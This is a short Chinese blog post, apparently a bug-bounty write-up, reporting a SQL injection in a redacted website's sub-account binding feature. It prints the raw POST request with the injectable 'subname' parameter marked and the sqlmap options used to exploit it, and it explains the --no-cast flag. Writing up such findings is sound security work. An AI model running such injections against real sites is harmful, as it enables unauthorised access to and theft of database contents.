1. 程式人生 > >【嚴重】XXXX網SQL註入

【嚴重】XXXX網SQL註入

enc 直接 o-c sql數據庫 cep win nbsp token app

RANK 80

金幣 100

數據包

POST xxxx/sendapp HTTP/1.1
Host: aaa.bbb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: XXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Cookie: XXXXX
DNT: 1
Connection: close

subname=admin*&group=1

參數subname可註入,直接將數據包存為txt ,-r ,--no-cast --threads=10就好了

用了很久的no-cast,還沒有細查過什麽意思。有一句解釋是這樣的:

默認情況下,sqlmap榨取數據時會將所有結果轉換為字符串,並用空格替換NULL結果

老版本mysql數據庫對此提取不到數據,因而需要該參數取消這個默認處理方式

註入點,還是在於掃描器爬蟲的深度和廣度、模擬登錄載入cookie、token等

後來查看了一下,原來位置是在 賬號管理功能模塊的綁定賬號,即A賬號綁定子賬號B,B的名字可註入。這個點,確實一般的掃描器會掃麽是個問題。挖洞還是在於去鉆吧。

【嚴重】XXXX網SQL註入